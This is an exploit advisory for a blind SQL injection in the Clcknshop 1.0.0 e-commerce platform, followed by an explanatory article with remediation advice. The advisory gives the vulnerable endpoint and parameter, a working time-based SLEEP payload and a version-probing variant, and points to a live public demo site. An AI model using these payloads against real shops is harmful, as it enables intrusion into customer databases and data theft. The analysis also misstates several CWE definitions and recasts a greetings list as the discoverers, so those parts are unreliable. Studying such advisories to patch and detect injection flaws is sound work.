Clcknshop 1.0.0 - SQL Injection

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-10-09 
# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Version: 1.0.0
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /collection/all

GET parameter 'tag' is vulnerable to SQL Injection

https://website/collection/all?tag=[SQLi]

---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---


Clcknshop 1.0.0 – SQL Injection Vulnerability Analysis (CVE-2023-4708)

Clcknshop 1.0.0, a multitenancy e-commerce solution developed by Infosoftbd Solutions, has been identified as vulnerable to a critical SQL Injection flaw. This vulnerability, discovered by security researcher CraCkEr on August 16, 2023, affects the collection/all endpoint and allows attackers to exploit the tag parameter through a time-based blind SQL injection technique.

Overview of the Vulnerability

The vulnerability lies in the way the application processes user input via the GET parameter tag. When an attacker sends a crafted payload through this parameter, the application fails to sanitize or validate input, leading to direct execution of malicious SQL queries. This flaw falls under multiple CWE classifications:

  • CWE-89: Improper Neutralization of Input During Output (SQL Injection)
  • CWE-74: Incorrect Handling of Exceptional Conditions (e.g., error responses not properly filtered)
  • CWE-707: Improper Restriction of Operations

With a CVE-2023-4708 assigned, this vulnerability is recognized as a high-risk security issue due to its potential to compromise database integrity and confidentiality.

Attack Vector: Time-Based Blind SQL Injection

The exploit leverages a time-based blind SQL injection technique, which is particularly effective when the application does not return direct error messages or query results. Instead, the attacker measures the response time to infer whether a condition is true or false.

Here’s the payload used in the exploit:

tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z

Explanation:

This payload exploits MySQL’s SLEEP() function, which pauses execution for a specified number of seconds. The injection works as follows:

  1. The tag parameter is set to tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z.
  2. The SQL query is constructed as: SELECT * FROM products WHERE tag = 'tshirt' XOR (SELECT 0 FROM (SELECT SLEEP(6)) a) XOR 'Z'.
  3. If the SLEEP(6) function executes, the server response will take approximately 6 seconds to return.
  4. If the function is not executed (e.g., due to a syntax error or failed condition), the response time remains normal.

By measuring the delay, an attacker can determine whether the SQL query condition is true, enabling them to extract information from the database bit by bit.

Real-World Implications

Consider a scenario where an attacker aims to discover the database version:

tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6))WHERE(VERSION()LIKE'5%'))a)XOR'Z

Upon sending this payload, if the server responds with a 6-second delay, it confirms that the database version starts with 5—indicating MySQL version 5.0 or higher.

Attackers can use this method to:

  • Enumerate database tables
  • Extract usernames and passwords
  • Modify product listings or pricing
  • Perform data exfiltration via time-based queries

Such actions can lead to financial loss, data breaches, and reputational damage—especially for an e-commerce platform handling sensitive user data.

Impact and Risk Assessment

Impact Severity Exploitability
Database Access High High (no authentication required)
Data Theft High Medium (requires time-based probing)
Application Crash Medium Low (if SLEEP is abused excessively)

Given that the demo site https://kidszone.clckn.shop/ is publicly accessible, this vulnerability is not only theoretical but exploitable in real-world environments.

Remediation and Best Practices

Developers and administrators must implement the following defensive measures:

  • Input Validation: Ensure all user inputs (like tag) are sanitized and validated against a predefined list of allowed values.
  • Parameterized Queries: Use prepared statements or ORM frameworks to prevent direct SQL injection.
  • Rate Limiting: Implement rate limiting on endpoints to detect and block excessive time-based probing.
  • Logging & Monitoring: Enable detailed logging of SQL queries and monitor for suspicious patterns.
  • Security Testing: Conduct regular penetration testing and use tools like SQLMap to detect such vulnerabilities.

For Clcknshop 1.0.0 specifically, the vendor should:

  • Release a patch to sanitize the tag parameter
  • Update documentation with security guidelines
  • Apply strict input filtering for all GET parameters

Conclusion

SQL injection remains one of the most prevalent and dangerous web vulnerabilities. The Clcknshop 1.0.0 case exemplifies how a seemingly simple input parameter can become a gateway to full database compromise. As cyber threats evolve, developers must prioritize security by design—especially in e-commerce systems where data integrity and confidentiality are paramount.

Security researchers and ethical hackers like CraCkEr, MoizSid09, and 0x0CryptoJob play a vital role in identifying and reporting such flaws, helping vendors strengthen their products before malicious actors exploit them.